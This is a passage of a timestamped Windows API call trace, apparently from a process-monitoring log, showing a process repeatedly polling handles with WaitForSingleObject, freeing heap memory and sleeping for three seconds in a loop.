	[0212.816] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.816] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.816] Sleep (dwMilliseconds=0xbb8) 
	[0212.832] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.832] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.833] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.833] Sleep (dwMilliseconds=0xbb8) 
	[0212.847] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.847] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.847] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.847] Sleep (dwMilliseconds=0xbb8) 
	[0212.863] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.863] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.863] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.863] Sleep (dwMilliseconds=0xbb8) 
	[0212.878] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.878] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.878] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.878] Sleep (dwMilliseconds=0xbb8) 
	[0212.894] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.894] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.894] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.894] Sleep (dwMilliseconds=0xbb8) 
	[0212.909] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.909] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.909] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.909] Sleep (dwMilliseconds=0xbb8) 
	[0212.939] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.939] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.939] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.939] Sleep (dwMilliseconds=0xbb8) 
	[0212.941] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.941] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.941] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.941] Sleep (dwMilliseconds=0xbb8) 
	[0212.956] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.956] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.956] Sleep (dwMilliseconds=0xbb8) 
	[0212.972] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.972] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.972] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.972] Sleep (dwMilliseconds=0xbb8) 
	[0212.988] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.988] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.988] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.988] Sleep (dwMilliseconds=0xbb8) 
	[0213.004] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.004] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.004] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.004] Sleep (dwMilliseconds=0xbb8) 
	[0213.019] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.019] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.019] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.019] Sleep (dwMilliseconds=0xbb8) 
	[0213.034] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.034] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.034] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.034] Sleep (dwMilliseconds=0xbb8) 
	[0213.050] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.050] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.050] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.050] Sleep (dwMilliseconds=0xbb8) 
	[0213.065] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.065] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.065] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.065] Sleep (dwMilliseconds=0xbb8) 
	[0213.081] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.081] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.081] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.081] Sleep (dwMilliseconds=0xbb8) 
	[0213.097] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.097] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.097] Sleep (dwMilliseconds=0xbb8) 
	[0213.112] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.112] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.112] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.112] Sleep (dwMilliseconds=0xbb8) 
	[0213.128] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.128] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.128] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.128] Sleep (dwMilliseconds=0xbb8) 
	[0213.143] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.143] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.143] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.144] Sleep (dwMilliseconds=0xbb8) 
	[0213.159] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.159] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.159] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.159] Sleep (dwMilliseconds=0xbb8) 
	[0213.175] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.175] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.175] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.176] Sleep (dwMilliseconds=0xbb8) 
	[0213.191] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.191] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.191] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.191] Sleep (dwMilliseconds=0xbb8) 
	[0213.207] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.207] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.207] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.207] Sleep (dwMilliseconds=0xbb8) 
	[0213.222] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.222] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.222] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.222] Sleep (dwMilliseconds=0xbb8) 
	[0213.237] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.237] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.237] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.237] Sleep (dwMilliseconds=0xbb8) 
	[0213.253] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.253] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.254] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.254] Sleep (dwMilliseconds=0xbb8) 
	[0213.269] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.269] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.269] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.269] Sleep (dwMilliseconds=0xbb8) 
	[0213.284] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.284] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.284] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.284] Sleep (dwMilliseconds=0xbb8) 
	[0213.299] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.299] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.299] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.299] Sleep (dwMilliseconds=0xbb8) 
	[0213.331] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.331] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.331] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.331] Sleep (dwMilliseconds=0xbb8) 
	[0213.363] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.363] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.363] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.363] Sleep (dwMilliseconds=0xbb8) 
	[0213.378] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.378] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.378] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.378] Sleep (dwMilliseconds=0xbb8) 
	[0213.394] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.394] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.394] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.394] Sleep (dwMilliseconds=0xbb8) 
	[0213.409] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.409] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.409] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.409] Sleep (dwMilliseconds=0xbb8) 
	[0213.425] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.425] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.425] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.425] Sleep (dwMilliseconds=0xbb8) 
	[0213.441] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.441] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.441] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.441] Sleep (dwMilliseconds=0xbb8) 
	[0213.457] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.457] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.457] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.457] Sleep (dwMilliseconds=0xbb8) 
	[0213.526] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.526] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.526] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.526] Sleep (dwMilliseconds=0xbb8) 
	[0213.565] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.565] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.565] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.565] Sleep (dwMilliseconds=0xbb8) 
	[0213.592] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.592] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.592] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.592] Sleep (dwMilliseconds=0xbb8) 
	[0213.596] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.596] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.596] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.597] Sleep (dwMilliseconds=0xbb8) 
	[0213.623] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.623] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.623] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.623] Sleep (dwMilliseconds=0xbb8) 
	[0213.627] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.627] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.627] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.627] Sleep (dwMilliseconds=0xbb8) 
	[0213.643] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.643] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.643] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.643] Sleep (dwMilliseconds=0xbb8) 
	[0213.659] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.659] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.659] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.659] Sleep (dwMilliseconds=0xbb8) 
	[0213.674] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.675] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.675] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.675] Sleep (dwMilliseconds=0xbb8) 
	[0213.736] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.736] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.736] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.736] Sleep (dwMilliseconds=0xbb8) 
	[0213.783] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.783] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.783] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.783] Sleep (dwMilliseconds=0xbb8) 
	[0213.806] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.806] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.806] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.806] Sleep (dwMilliseconds=0xbb8) 
	[0213.815] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.815] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.815] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.815] Sleep (dwMilliseconds=0xbb8) 
	[0213.830] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.830] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.830] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.830] Sleep (dwMilliseconds=0xbb8) 
	[0213.846] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.847] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.847] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.847] Sleep (dwMilliseconds=0xbb8) 
	[0213.862] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.862] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.862] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.862] Sleep (dwMilliseconds=0xbb8) 
	[0213.877] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.877] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.877] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.877] Sleep (dwMilliseconds=0xbb8) 
	[0213.894] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.894] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.894] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.894] Sleep (dwMilliseconds=0xbb8) 
	[0213.970] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0213.970] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0213.970] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0213.970] Sleep (dwMilliseconds=0xbb8) 
	[0214.018] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.019] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.019] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.019] Sleep (dwMilliseconds=0xbb8) 
	[0214.039] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.039] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.040] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.040] Sleep (dwMilliseconds=0xbb8) 
	[0214.048] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.048] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.048] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.049] Sleep (dwMilliseconds=0xbb8) 
	[0214.064] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.064] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.064] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.064] Sleep (dwMilliseconds=0xbb8) 
	[0214.080] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.080] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.080] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.080] Sleep (dwMilliseconds=0xbb8) 
	[0214.096] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.096] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.096] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.096] Sleep (dwMilliseconds=0xbb8) 
	[0214.113] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.113] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.113] Sleep (dwMilliseconds=0xbb8) 
	[0214.128] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.128] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.128] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.128] Sleep (dwMilliseconds=0xbb8) 
	[0214.220] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.220] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.220] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.220] Sleep (dwMilliseconds=0xbb8) 
	[0214.267] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.267] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.267] Sleep (dwMilliseconds=0xbb8) 
	[0214.296] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.296] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.296] Sleep (dwMilliseconds=0xbb8) 
	[0214.298] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.298] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.298] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.298] Sleep (dwMilliseconds=0xbb8) 
	[0214.314] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.314] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.314] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.314] Sleep (dwMilliseconds=0xbb8) 
	[0214.331] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.331] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.332] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.332] Sleep (dwMilliseconds=0xbb8) 
	[0214.347] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.347] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.348] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.348] Sleep (dwMilliseconds=0xbb8) 
	[0214.361] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.361] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.361] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.361] Sleep (dwMilliseconds=0xbb8) 
	[0214.379] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.379] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.379] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0214.379] Sleep (dwMilliseconds=0xbb8) 
	[0214.469] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.469] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.469] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27338b8) returned 1
	[0214.470] Sleep (dwMilliseconds=0xbb8) 
	[0214.564] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.564] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.564] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2734330) returned 1
	[0214.564] Sleep (dwMilliseconds=0xbb8) 
	[0214.641] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0214.641] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0214.641] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2734c90) returned 1
	[0214.641] Sleep (dwMilliseconds=0xbb8) 
	[0218.744] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0218.744] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0218.744] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0218.744] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb950) returned 1
	[0218.744] Sleep (dwMilliseconds=0xbb8) 
	[0218.791] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0218.791] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0218.791] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0218.791] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb950) returned 1
	[0218.791] Sleep (dwMilliseconds=0xbb8) 
	[0218.815] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0218.815] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0218.815] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0218.815] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb950) returned 1
